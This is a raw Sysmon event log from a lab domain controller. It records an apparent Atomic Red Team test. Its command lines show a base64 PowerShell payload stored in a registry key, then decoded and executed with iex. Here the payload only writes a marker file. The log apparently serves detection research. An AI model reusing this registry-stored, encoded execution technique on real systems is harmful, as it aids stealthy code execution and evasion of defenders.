ccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64) 154100x80000000000000002204441Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.338{5ABCFE62-EA3C-6040-664E-00000000AD01}4828C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam /v ART /t REG_SZ /d U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Encoded payload in next command is the following \""Set-Content -path \""$env:SystemRoot/Temp/art-marker.txt\"" -value \""Hello from the Atomic Red Team\""\"" reg.exe add \""HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam\"" /v ART /t REG_SZ /d \""U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"" iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))} 10341000x80000000000000002204440Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.322{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204439Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.322{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204438Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.290{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204437Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.290{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002204436Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:10:04.275{5ABCFE62-EA3C-6040-654E-00000000AD01}376\PSHost.132593406041986513.376.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002204435Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.259{5ABCFE62-EA3C-6040-654E-00000000AD01}376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_kude0dtg.etn.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204434Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.259{5ABCFE62-EA3C-6040-654E-00000000AD01}376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4xqnx1u2.fi0.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002204433Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.243{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4xqnx1u2.fi0.ps12021-03-04 14:10:04.243 10341000x80000000000000002204432Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.228{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204431Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204430Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002204429Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204428Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204427Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204426Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204425Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-99F1-603E-7907-00000000AD01}30802060C:\Windows\system32\csrss.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204424Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002204423Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.198{5ABCFE62-EA3C-6040-654E-00000000AD01}376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Encoded payload in next command is the following \""Set-Content -path \""$env:SystemRoot/Temp/art-marker.txt\"" -value \""Hello from the Atomic Red Team\""\"" reg.exe add \""HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam\"" /v ART /t REG_SZ /d \""U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"" iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002204422Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002204421Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.197{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002204420Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.181{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=91DE8FA793AC949C2A365F9BCD91DBA6,SHA256=74865E0C2B911E9962482E868AAA3E01A4CBD30C51C7FCADF9B34188C1C88C7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204419Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.150{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=D3894BCAE693F1BEA8F5DA4BD24090FD,SHA256=1E436416CB03B75053408CD524FDEF2B65031E9752A1BD1BB74F0A0F25A7EE33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204418Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.134{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=70FFA2EF661C6DAD17F0A94E65FD220D,SHA256=5A408F979D387874ED1744B0BDC27579518F37772B01539546FCB69A2976D16C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204417Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.134{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E3F5E6672FA105D67BE024364566332,SHA256=5B86C74628120C254EA8694FA722AC8F39227DA8D85BA80BCC17216FE697F949,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204416Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.118{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204415Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.118{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 